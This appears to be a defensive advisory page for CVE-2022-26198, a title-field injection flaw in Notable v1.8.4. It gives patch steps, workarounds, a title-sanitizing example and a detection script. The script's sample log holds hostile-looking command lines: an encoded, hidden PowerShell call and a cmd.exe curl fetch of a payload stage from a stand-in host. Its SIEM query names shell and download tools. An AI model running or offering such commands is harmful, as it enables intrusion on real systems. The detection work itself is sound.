CVE-2022-26198
📋 TL;DR
CVE-2022-26198 is a critical remote code execution vulnerability in Notable v1.8.4 where attackers can inject malicious payloads into the Title text field to execute arbitrary code on the system. This affects all users running Notable v1.8.4 who edit or view notes with crafted titles. The vulnerability stems from improper input sanitization in the text editing functionality.
💻 Affected Systems
- Notable
📦 What is this software?
Notable by Notable
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing attackers to execute arbitrary commands, install malware, steal data, or pivot to other systems on the network.
Likely Case
Remote code execution leading to data theft, system manipulation, or installation of backdoors on vulnerable Notable instances.
If Mitigated
No impact if proper input validation and sanitization are implemented, or if the vulnerable version is not exposed to untrusted users.
🎯 Exploit Status
The GitHub issue shows proof-of-concept exploitation details. Attackers can craft malicious titles that execute code when viewed or edited.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v1.9.0 or later
Vendor Advisory: https://github.com/notable/notable/issues/1595
Restart Required: Yes
Instructions:
1. Backup your Notable data.
2. Download and install Notable v1.9.0 or later from the official GitHub releases.
3. Replace the existing installation.
4. Restart Notable to apply the update.
🔧 Temporary Workarounds
Disable Note Sharing
Prevent sharing notes with untrusted users to reduce attack surface
Input Validation Filter
Implement custom input validation to sanitize title fields before processing
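One way to build the title filter described in the workaround above, as an added example that is not Notable's own code. The page says only that the Title field is processed without proper sanitization; this example assumes the title ends up in an HTML view, so the defence is to normalize it, strip control and bidi-formatting characters, and escape it so it can only ever render as text. The length limit and the function names are assumptions of this example.

```python
import html
import re
import unicodedata

# Assumed cap on title length; the page does not state one.
MAX_TITLE_LEN = 200

# C0/C1 control characters, zero-width characters and Unicode bidi/format
# controls, none of which belong in a note title.
_CONTROL_RE = re.compile(
    r"[\x00-\x1f\x7f-\x9f\u200b-\u200f\u202a-\u202e\u2066-\u2069]"
)

# Patterns that indicate someone is putting markup rather than a name in a title.
_MARKUP_RE = re.compile(r"<|javascript:|\bon\w+\s*=", re.IGNORECASE)


def sanitize_title(raw: str) -> str:
    """Return a title that is safe to place in HTML: normalized, stripped of
    control characters, truncated and escaped (including quotes)."""
    if not isinstance(raw, str):
        raise TypeError("title must be a string")
    title = unicodedata.normalize("NFC", raw)
    title = _CONTROL_RE.sub("", title).strip()
    if len(title) > MAX_TITLE_LEN:
        title = title[:MAX_TITLE_LEN]
    # html.escape turns < > & " ' into entities, so any tag or attribute
    # injection survives only as literal text.
    return html.escape(title, quote=True)


def contains_markup(raw: str) -> bool:
    """True when the raw title looks like markup or script rather than text;
    useful for logging or alerting before the value is sanitized."""
    return _MARKUP_RE.search(raw) is not None


def process_title(raw: str) -> tuple[str, bool]:
    """Convenience wrapper: (sanitized title, flagged-as-suspicious)."""
    return sanitize_title(raw), contains_markup(raw)


if __name__ == "__main__":
    for sample in ("Grocery list", "<b>bold</b>", "Meeting\x00 notes\n"):
        print(repr(sample), "->", process_title(sample))
```

Input filtering like this is a stopgap; the durable fix is escaping at the point of rendering (or using a rendering API that treats the title as text), which is what the vendor update provides.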
🧯 If You Can't Patch
- Isolate Notable instances on segmented networks with strict firewall rules
- Implement application-level WAF rules to detect and block malicious payloads in title fields
🔍 How to Verify
Check if Vulnerable:
Check Notable version in Help > About menu. If version is exactly 1.8.4, the system is vulnerable.
Check Version:
Notable does not have a CLI version check. Use Help > About menu in the application.
Verify Fix Applied:
After updating, verify version is 1.9.0 or later in Help > About menu.
📡 Detection & Monitoring
Log Indicators:
- Unusual process execution from Notable
- Suspicious command-line arguments in Notable processes
- Multiple failed attempts to access restricted system resources
Network Indicators:
- Unexpected outbound connections from Notable process
- Beaconing behavior to external IPs
SIEM Query:
process_name:"Notable.exe" AND (command_line:*powershell* OR command_line:*cmd.exe* OR command_line:*wget* OR command_line:*curl*)
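The SIEM query above, run over constructed sample process-creation log lines, as an added example that is not part of the original advisory. It generalizes the query in one respect: it also matches when the shell or downloader is a child of Notable (via a parent_process_name field), because a process-creation event for powershell.exe carries powershell in its own command line, not in Notable's. The log format, field names and every event below are constructed for this example.

```python
import re

# Constructed sample events in a simple key="value" format (not real telemetry).
# Fields mirror the SIEM query above plus an assumed parent_process_name field.
SAMPLE_LOG = """\
ts="2024-01-01T10:00:00Z" process_name="Notable.exe" parent_process_name="explorer.exe" command_line="C:\\Program Files\\Notable\\Notable.exe"
ts="2024-01-01T10:00:05Z" process_name="powershell.exe" parent_process_name="Notable.exe" command_line="powershell.exe -nop -w hidden -enc AAAA"
ts="2024-01-01T10:00:06Z" process_name="cmd.exe" parent_process_name="Notable.exe" command_line="cmd.exe /c curl http://example.invalid/stage"
ts="2024-01-01T10:01:00Z" process_name="powershell.exe" parent_process_name="explorer.exe" command_line="powershell.exe -File backup.ps1"
ts="2024-01-01T10:02:00Z" process_name="Notable.exe" parent_process_name="explorer.exe" command_line="Notable.exe --open notes.md"
"""

# Tokens taken from the SIEM query on the page.
SUSPICIOUS_TOKENS = ("powershell", "cmd.exe", "wget", "curl")

_FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_line(line: str) -> dict:
    """Parse one key="value" log line into a dict."""
    return dict(_FIELD_RE.findall(line))


def matches_page_query(event: dict) -> bool:
    """Literal reading of the page's query: the Notable process itself must
    carry a shell/downloader token in its own command line."""
    cmd = event.get("command_line", "").lower()
    return event.get("process_name", "") == "Notable.exe" and any(
        tok in cmd for tok in SUSPICIOUS_TOKENS
    )


def is_suspicious(event: dict) -> bool:
    """Broader rule: Notable is either the process or its parent, and the
    command line contains one of the shell/downloader tokens."""
    names = (event.get("process_name", ""), event.get("parent_process_name", ""))
    if not any(n.lower() == "notable.exe" for n in names):
        return False
    cmd = event.get("command_line", "").lower()
    return any(tok in cmd for tok in SUSPICIOUS_TOKENS)


def find_suspicious(log_text: str) -> list:
    """Return the events in log_text that the broader rule flags."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    return [e for e in events if is_suspicious(e)]


def count_page_query_hits(log_text: str) -> int:
    """How many events the literal query would flag on the same input."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    return sum(matches_page_query(e) for e in events)


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["ts"], hit["parent_process_name"], "->", hit["command_line"])
    print("literal query hits:", count_page_query_hits(SAMPLE_LOG))
```

On the sample, the literal query matches nothing while the parent-aware rule flags the two child processes spawned by Notable, so when translating the query into a real SIEM, key on the parent process (or both fields) and tune the token list to what the host normally runs; an ordinary PowerShell backup script launched from Explorer is left alone.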